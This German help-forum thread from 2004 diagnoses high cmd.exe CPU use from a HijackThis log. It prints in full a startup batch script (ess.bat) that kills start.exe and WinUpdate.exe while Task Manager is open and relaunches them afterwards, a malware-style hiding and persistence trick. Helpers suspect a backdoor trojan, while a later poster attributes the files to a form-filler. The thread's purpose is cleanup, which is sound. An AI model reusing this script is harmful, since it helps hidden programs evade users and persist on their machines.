hi,

nach dem booten des rechners beansprucht die cmd.exe bis zu 80 % der cpu-leistung. wenn ich den prozess im taskmanager kille dann ist alles wieder in ordnung.

wodurch wird der prozess aufgerufen ? und was kann ich dagegen tun ?

mit hijack this komm ich leider net weiter mangels fachwissen. könnt ihr mir sagen ob hier ein trojaner am werke ist ? als antivirenprog hab ich gdata antivirus am laufen...

thx suicid71

Logfile of HijackThis v1.97.7
Scan saved at 20:04:15, on 11.05.2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
E:\AntiVirenKit InternetSecurity\AVK\AVKService.exe
E:\AntiVirenKit InternetSecurity\AVK\AVKWCtl.exe
C:\WINDOWS\System32\CTsvcCDA.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\SCARDS32.EXE
C:\WINDOWS\System32\MsPMSPSv.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\Creative\SBAudigy2ZS\Surround Mixer\CTSysVol.exe
E:\CloneCD\CloneCDTray.exe
E:\Daemon Tools\daemon.exe
E:\Logitech\iTouch\iTouch.exe
E:\Winamp\winampa.exe
E:\Logitech\MouseWare\system\em_exec.exe
C:\WINDOWS\System32\RUNDLL32.EXE
C:\WINDOWS\System32\WF2K.EXE
C:\Programme\Gemeinsame Dateien\G DATA\AVKMail\AVKPOP.EXE
C:\WINDOWS\System32\rundll32.exe
C:\WINDOWS\System32\CTHELPER.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\system32\ntvdm.exe
E:\AntiVirenKit InternetSecurity\Webfilter\Webfilter.exe
E:\Personal Backup 3\Persbackup.exe
E:\ANTIVI~1\WEBFIL~1\ADSCLE~1.EXE
C:\WINDOWS\update\start.exe
C:\WINDOWS\System32\taskmgr.exe
C:\Programme\Internet Explorer\iexplore.exe
E:\!Router\2.1.4\imonc\Imonc.exe
C:\Programme\Internet Explorer\iexplore.exe
D:\Programme\HiJack This 1.97\HijackThis.exe

O2 - BHO: Poly HTML Filter BHO - {0140DF95-9128-4053-AE72-F43F0CFCA062} - C:\WINDOWS\system32\SiKernel.dll
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - E:\Adobe\Acrobat 6.0\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {40FB69E1-9B7B-453F-B238-37D8E9528929} - E:\AntiVirenKit InternetSecurity\Webfilter\PAKIEPlugins.dll
O2 - BHO: (no name) - {AE7CD045-E861-484f-8273-0445EE161910} - E:\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Offliner AdFilter Helper - {DC9377A2-2E8D-44A1-99DB-F8A821DF254D} - C:\WINDOWS\system32\SiPlugins.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: (no name) - {ACB1E670-3217-45C4-A021-6B829A8A27CB} - (no file)
O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file)
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - E:\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: WebFilter-Leiste - {75CD0BC5-E317-449C-9FF6-4986B3D48F64} - E:\ANTIVI~1\WEBFIL~1\PAKIEGUI.dll
O4 - HKLM\..\Run: [CTSysVol] C:\Programme\Creative\SBAudigy2ZS\Surround Mixer\CTSysVol.exe /r
O4 - HKLM\..\Run: [SBDrvDet] C:\Programme\Creative\SB Drive Det\SBDrvDet.exe /r
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\UpdReg.EXE
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [CloneCDElbyCDFL] "E:\CloneCD\ElbyCheck.exe" /L ElbyCDFL
O4 - HKLM\..\Run: [CloneCDTray] "E:\CloneCD\CloneCDTray.exe"
O4 - HKLM\..\Run: [DAEMON Tools-1033] "E:\Daemon Tools\daemon.exe" -lang 1033 -lock
O4 - HKLM\..\Run: [zBrowser Launcher] E:\Logitech\iTouch\iTouch.exe
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\Run: [WinampAgent] E:\Winamp\winampa.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [WinFoxV2] C:\WINDOWS\System32\WF2K.EXE Initial
O4 - HKLM\..\Run: [WinFast2KLoadDefault] rundll32.exe wf2kcpl.dll,DllLoadDefaultSettings
O4 - HKLM\..\Run: [AVK Mail Checker] "C:\Programme\Gemeinsame Dateien\G DATA\AVKMail\AVKPOP.EXE"
O4 - HKLM\..\Run: [CTHelper] CTHELPER.EXE
O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe /auto
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [update] C:\WINDOWS\update\hide C:\WINDOWS\update\ess.bat
O4 - Startup: Persbackup.lnk = E:\Personal Backup 3\Persbackup.exe
O8 - Extra context menu item: Add selected links to Link Container - E:\ANTIVI~1\WEBFIL~1\System\Scripts\off_collector_sel.htm
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Show domain links - E:\ANTIVI~1\WEBFIL~1\System\Scripts\off_domain_links.htm
O9 - Extra button: Recherchieren (HKLM)
O9 - Extra button: Yahoo! Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Messenger (HKLM)
O16 - DPF: {0A5FD7C5-A45C-49FC-ADB5-9952547D5715} (Creative Software AutoUpdate) - http://www.creative.com/SU/ocx/12119/CTSUEng.cab
O16 - DPF: {271A3CF5-5A54-447B-A08F-BE805F0DA60B} (DataDesign DDBAC Plug-In) - https://banking.seb.de/hbci/plugin/AXFOAM.CAB
O16 - DPF: {3E68E405-C6DE-49FF-83AE-41EE9F4C36CE} (Office Update Installation Engine) - http://office.microsoft.com/officeup...ntent/opuc.cab
O16 - DPF: {4E330863-6A11-11D0-BFD8-006097237877} (InstallFromTheWeb ActiveX Control) - http://tw.msi.com.tw/autobios/client/iftwclix.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://bin.mcafee.com/molbin/shared/...1/mcinsctl.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.co...070.3757407407
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} - http://bin.mcafee.com/molbin/shared/...19/mcgdmgr.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload.macromedia.com/pub...sh/swflash.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://www.creative.com/SU/ocx/12119/CTPID.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{C9D1872D-F958-4C68-BF01-293A7C2D97F0}: NameServer = 192.168.0.81
O17 - HKLM\System\CCS\Services\Tcpip\..\{F13613B1-728F-433A-8006-3E1FCB00888A}: NameServer = 192.168.0.81

hallo erstmal

so zu deinem problem:
</font><blockquote>Zitat:</font><hr /> wodurch wird der prozess aufgerufen ? und was kann ich dagegen tun ? </font>[/QUOTE]cmd.exe (früher command.com) ist die MS-DOS eingabeaufforderung von windows. wird entweder händisch aufgerufen oder durch dos scripte etwa
in deinem log ist auch eins drin das bei jedem start aufgerufen wird </font><blockquote>Zitat:</font><hr /> O4 - HKCU\..\Run: [update] C:\WINDOWS\update\hide C:\WINDOWS\update\ess.bat</font>[/QUOTE]sind nochn paar andre sachen drin die eventuell nicht hingehoern dazu später..

umd das ding zu entfernen pc neustarten -&gt;abgesicherter modus-&gt; den eintrag fixen die datei löschen oder evtl erst mal ihren inhalt hier posten (rechtsklick bearbeiten)-&gt; registry nahc der datei durchsuchen und evtl einträge löschen-&gt; neustart
dann müsste deien cmd.exe nicht emhr mit starten

was genua as script nun macht kann ich dir noch nicht sagen google findet imho nichts brauchbares hab aber auch nicht alle 27 treffer durchgeschaut..


zu den anderen sachen:

</font><blockquote>Zitat:</font><hr /> O2 - BHO: Poly HTML Filter BHO - {0140DF95-9128-4053-AE72-F43F0CFCA062} - C:\WINDOWS\system32\SiKernel.dll </font>[/QUOTE]google hits : 1
poste mal die eigenschaften der datei..
kenns nicht und google auch nicht und damit hatts in dem ordner eigentlich nicht viel verloren aber noch nicht fixen erst mal die eigensschaften posten


</font><blockquote>Zitat:</font><hr />O3 - Toolbar: (no name) - {ACB1E670-3217-45C4-A021-6B829A8A27CB} - (no file)
O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file) </font>[/QUOTE]uch die mal in der registry evtl findest dazu dann was sonst sehn die relativ überflüssig aus

soweit
Thomas

</font><blockquote>Zitat:</font><hr />Original erstellt von suicide71:
[QB]O4 - HKCU\..\Run: [update] C:\WINDOWS\update\hide C:\WINDOWS\update\ess.bat</font>[/QUOTE]Was steht denn in dieser ess.bat drin?

ciao

inhalt der ess.bat:

@echo off
cd "c:\WINDOWS\update"
pv -f -k start.exe
pv -f -k WinUpdate.exe

if not %OS%==Windows_NT goto win9x

set x=0
set n=0
:deb
set k=0
pv -d 5000
for /f %%i in ('pv ^| find "taskmgr.exe"') do ( set k=1 )
if %k%==1 if %x%==1 (
pv -f -k start.exe
pv -f -k WinUpdate.exe
set n=0
pv -d 20000
)
if %k%==0 if %x%==0 (
start /b start.exe
set n=1
)
set x=%n%
goto deb
)

:win9x
start.exe


was ist das ? zu winupdate hab ich nur was gefunden was auf nen trojaner schliessen lässt ..??

cu suicide71

Es ist wahrscheinlich ein Trojaner oder andere malware
</font><blockquote>Zitat:</font><hr /> C:\WINDOWS\update\start.exe </font>[/QUOTE]hatte ich im log übersehn nu is aber ja klar wo die da herkommt
entfern mal bitte die ess.bat und die beiden darin stehenden dateien wie oben beschrieben...
das sollte - eigentlich - das problem beheben

Nachtrag: Allerdings weiss ich nicht was die beiden exen anrichten insofern kanns sein das dein system bereits mit einigem mehr infiziert ist

</font><blockquote>Zitat:</font><hr />Process File: winupdate or winupdate.exe
Process Name: Winupdate
Description: Added to the system as a result of the RADO VIRUS! which is a Backdoor Trojan Horse.It gives its creator unauthorized remote access to your computer. When the Trojan is executed for the first time, it displays a fake error message with the text, "Incompartible Windows Version. </font>[/QUOTE]das da oben ist eine möglichkeit
allerdings gibt es genug verschiedene malware die dieselben namen benutzt. eventuell weiss ja jemand hier im forum mehr zu genau diesem einen

[ 11. Mai 2004, 22:48: Beitrag editiert von: Olo ]

Das ding ist warscheinlich eine datei, die von einem Virus / Wurm angelegt wurde, um sicherzugehen, dass dieser Virus / Wurm auch gestartet wird.

Ich denke aber, dass es nicht funktionieren kann, da ein ) zu viel ist.

kann aber auch ein irrtum sein...

grüsse,
Mario

also, habe nun die dateien gelöscht und alles funtzt wieder super. besten dank für den schnellen support !!!

Gut
Ich glaube langsam auch das das script nicht richtig funktioniert hat und deshalb die cmd.exe so eine hohe auslastung hatte..
normalerweise müsste so ein script in weniger als einer sekunde durchlaufen
auch der code ist an ein paar stellen sehr merkwürdig die sache mit der klammer zbsp die snooby ja schon erwähnt hat

Ich habe bei mir gaerde das selbe Phenomän festgestellt (mit der Winupdate.exe).

Mit dem Task Manager ließ sich das Programm nicht beenden, dann habe ich mal mit Prozess Explorer nachgeschaut und winupdate.exe wuzrde durch start.exe offengehalten. Nachden ich erst Start,exe gekickt habe und dann die Winupdate.exe hat es geklappt.

So, mittlerweile weiß ich auch wozu diese Programme gehören: AI Roboform, ein Auto Ausfüllprogramm was als Beigabe zum Avant Browser dabei ist,

Spybot 1.3 final hat diese 2 Dateien zumindest nicht als Sypware oder ähnliches angeprangert.